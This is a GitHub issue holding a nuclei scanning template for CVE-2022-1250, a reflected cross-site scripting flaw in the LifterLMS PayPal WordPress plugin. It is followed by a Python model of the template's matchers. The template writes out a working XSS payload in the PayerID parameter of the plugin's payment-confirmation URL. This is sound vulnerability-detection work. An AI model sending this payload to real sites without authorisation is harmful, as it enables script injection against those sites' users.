projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Home Page: https://github.com/projectdiscovery/nuclei

CVE-2022-1250

akincibor opened this issue

id: CVE-2022-1250

info:
  name: LifterLMS PayPal < 1.4.0 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape some parameters from the payment confirmation page before outputting them back in the page, leading to a Reflected Cross-Site Scripting issue.
  reference:
    - https://wpscan.com/vulnerability/1f8cb0b9-7447-44db-8d13-292db5b17718
  tags: xss,wp,wordpress,wp-plugin

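requests:
  - method: GET
    path:
      # The PayerID parameter carries the marker that a vulnerable page reflects unescaped.
      - '{{BaseURL}}/purchase/confirm-payment/?order=order-xxxxxxx&PayerID=aa"><img src onerror=alert(/XSS/)>'

    # All three matchers below must succeed for the template to report a finding.
    matchers-condition: and
    matchers:
      # The marker must come back verbatim (not HTML-escaped) in the response body.
      - type: word
        part: body
        words:
          - '"><img src onerror=alert(/XSS/)>'

      # The response must be served as HTML, otherwise the reflection is not rendered as markup.
      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200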

Self-closing, as there are really, really few websites using it, to reduce the number of nuclei requests.
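The following is an added example, not part of the original issue or of the nuclei engine: a simplified Python model of the template's three matchers, run against constructed responses to show which ones it flags. The `render_confirm_page` helper and all sample responses are hypothetical stand-ins for the plugin's confirmation page.

```python
import html
from dataclasses import dataclass

# Marker string copied from the template's body matcher.
MARKER = '"><img src onerror=alert(/XSS/)>'
PAYER_ID = "aa" + MARKER  # PayerID value the template sends


@dataclass
class Response:
    status: int
    content_type: str
    body: str


def render_confirm_page(payer_id: str, escape: bool) -> str:
    """Hypothetical confirmation page that echoes PayerID into an attribute."""
    value = html.escape(payer_id, quote=True) if escape else payer_id
    return f'<input type="hidden" name="PayerID" value="{value}">'


def template_matches(resp: Response) -> bool:
    """Simplified model of the three matchers joined by matchers-condition: and."""
    body_hit = MARKER in resp.body  # type: word, part: body
    header_hit = "text/html" in f"Content-Type: {resp.content_type}"  # part: header
    status_hit = resp.status == 200  # type: status
    return body_hit and header_hit and status_hit


# Constructed responses, not captured from any real site.
SAMPLES = {
    "unescaped_html": Response(200, "text/html; charset=UTF-8", render_confirm_page(PAYER_ID, False)),
    "escaped_html": Response(200, "text/html; charset=UTF-8", render_confirm_page(PAYER_ID, True)),
    "plain_text_echo": Response(200, "text/plain", PAYER_ID),
    "not_found_page": Response(404, "text/html", render_confirm_page(PAYER_ID, False)),
}


def evaluate_samples() -> dict:
    """Return, per sample name, whether the modelled template would report it."""
    return {name: template_matches(resp) for name, resp in SAMPLES.items()}


if __name__ == "__main__":
    for name, hit in evaluate_samples().items():
        print(f"{name:16} match={hit}")
```

Only the unescaped HTML response satisfies all three matchers; output that escapes the parameter, a non-HTML content type, or a non-200 status each cause the `and` condition to fail.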